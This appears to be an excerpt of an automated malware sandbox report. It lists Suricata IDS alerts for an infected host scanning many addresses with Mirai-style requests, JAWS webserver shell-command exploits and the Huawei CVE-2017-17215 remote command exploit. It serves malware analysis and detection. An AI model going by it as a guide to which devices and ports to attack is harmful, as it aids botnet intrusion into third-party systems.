              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42154 -> 24.85.72.91:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56394 -> 207.57.102.65:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56394 -> 207.57.102.65:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44478 -> 62.185.66.134:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33460 -> 209.27.77.198:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42374 -> 186.110.190.115:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42154 -> 24.85.72.91:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46362 -> 186.7.234.126:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44478 -> 62.185.66.134:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54544 -> 142.54.51.63:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54544 -> 142.54.51.63:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49328 -> 199.115.194.71:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49328 -> 199.115.194.71:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56644 -> 186.145.220.98:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60982 -> 47.204.4.100:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60982 -> 47.204.4.100:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37782 -> 134.45.14.17:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37782 -> 134.45.14.17:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54136 -> 173.228.139.100:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54136 -> 173.228.139.100:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45616 -> 82.98.84.203:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45616 -> 82.98.84.203:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55362 -> 216.237.84.186:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55362 -> 216.237.84.186:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33708 -> 196.180.203.236:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33708 -> 196.180.203.236:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57754 -> 186.96.143.66:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44720 -> 186.212.3.150:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45712 -> 186.73.163.37:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43248 -> 186.40.157.5:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45146 -> 186.53.187.138:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43866 -> 178.117.42.161:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37604 -> 186.121.193.246:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47994 -> 109.101.110.223:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47994 -> 109.101.110.223:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47420 -> 186.205.153.170:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38670 -> 106.47.50.215:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38670 -> 106.47.50.215:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43866 -> 178.117.42.161:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59312 -> 17.178.232.178:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59534 -> 110.94.35.110:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59534 -> 110.94.35.110:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34740 -> 54.4.21.234:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54484 -> 88.166.49.56:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34740 -> 54.4.21.234:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50066 -> 186.236.224.104:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51126 -> 156.57.135.5:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56300 -> 186.133.58.163:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41438 -> 186.27.90.245:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59312 -> 17.178.232.178:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35604 -> 186.43.48.40:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60012 -> 156.100.45.131:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40130 -> 186.115.226.164:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60250 -> 186.81.189.176:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51030 -> 186.226.67.227:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59858 -> 113.100.123.72:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35742 -> 133.144.61.78:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40106 -> 122.124.172.16:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58902 -> 124.90.72.187:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40106 -> 122.124.172.16:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45232 -> 182.218.221.143:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56832 -> 101.7.61.76:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41490 -> 186.64.138.241:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40146 -> 186.178.208.100:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44140 -> 207.142.3.110:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44140 -> 207.142.3.110:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45010 -> 186.55.175.193:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59858 -> 113.100.123.72:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37628 -> 156.145.177.26:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35742 -> 133.144.61.78:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43406 -> 186.161.92.217:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50424 -> 52.12.86.168:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51032 -> 89.126.34.148:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51032 -> 89.126.34.148:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42682 -> 186.124.8.29:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58902 -> 124.90.72.187:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53466 -> 186.51.211.83:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42292 -> 186.32.31.25:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42510 -> 23.39.211.93:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46762 -> 156.42.155.107:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54484 -> 88.166.49.56:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41698 -> 186.152.202.252:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46390 -> 186.126.117.102:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45232 -> 182.218.221.143:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35796 -> 198.130.15.203:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56832 -> 101.7.61.76:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35796 -> 198.130.15.203:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42086 -> 161.254.106.58:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45482 -> 131.221.215.96:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45482 -> 131.221.215.96:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40266 -> 120.7.216.0:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48696 -> 177.135.163.196:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48696 -> 177.135.163.196:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52482 -> 126.5.129.213:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52482 -> 126.5.129.213:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51078 -> 186.28.140.82:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50918 -> 74.10.112.63:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53012 -> 81.165.137.191:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53012 -> 81.165.137.191:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50424 -> 52.12.86.168:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55438 -> 186.147.206.117:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47002 -> 186.115.76.64:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42468 -> 156.38.111.88:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42788 -> 123.163.60.161:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42788 -> 123.163.60.161:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36364 -> 52.91.248.35:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36364 -> 52.91.248.35:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54994 -> 186.107.132.170:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40266 -> 120.7.216.0:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51936 -> 186.11.84.199:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54372 -> 186.223.22.73:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33724 -> 186.67.55.247:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37918 -> 186.50.181.164:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41474 -> 186.2.133.169:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43458 -> 186.252.183.115:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58880 -> 186.180.134.41:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37042 -> 152.211.76.223:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37042 -> 152.211.76.223:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50918 -> 74.10.112.63:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45154 -> 156.79.22.112:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38036 -> 89.95.26.129:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45370 -> 156.188.75.205:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56974 -> 156.163.43.202:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54462 -> 76.157.108.174:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42086 -> 161.254.106.58:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54462 -> 76.157.108.174:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53262 -> 186.28.37.187:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59170 -> 102.158.0.218:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59170 -> 102.158.0.218:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53678 -> 42.183.34.142:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53678 -> 42.183.34.142:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43972 -> 156.239.57.116:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38036 -> 89.95.26.129:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42510 -> 23.39.211.93:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47092 -> 150.111.127.136:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33158 -> 176.166.15.127:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33158 -> 176.166.15.127:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33810 -> 211.84.231.87:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33810 -> 211.84.231.87:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47092 -> 150.111.127.136:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56338 -> 156.165.75.195:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48612 -> 156.247.168.204:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44840 -> 186.46.246.248:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52516 -> 156.250.170.156:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57308 -> 156.164.40.17:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37314 -> 156.50.119.116:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45312 -> 156.207.105.190:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41032 -> 156.249.55.52:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47208 -> 156.248.4.172:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52114 -> 156.62.234.246:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57564 -> 156.58.113.206:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42836 -> 156.235.105.85:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56046 -> 156.11.228.157:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56358 -> 156.165.4.143:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41720 -> 156.150.45.187:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46902 -> 156.35.226.205:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57746 -> 156.233.137.74:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58970 -> 156.127.77.130:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58176 -> 156.194.105.239:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48364 -> 156.190.204.224:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40884 -> 156.99.218.221:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44112 -> 156.76.146.223:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47936 -> 156.136.201.247:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38838 -> 156.244.210.166:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43132 -> 190.54.138.216:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55652 -> 190.51.226.14:37215
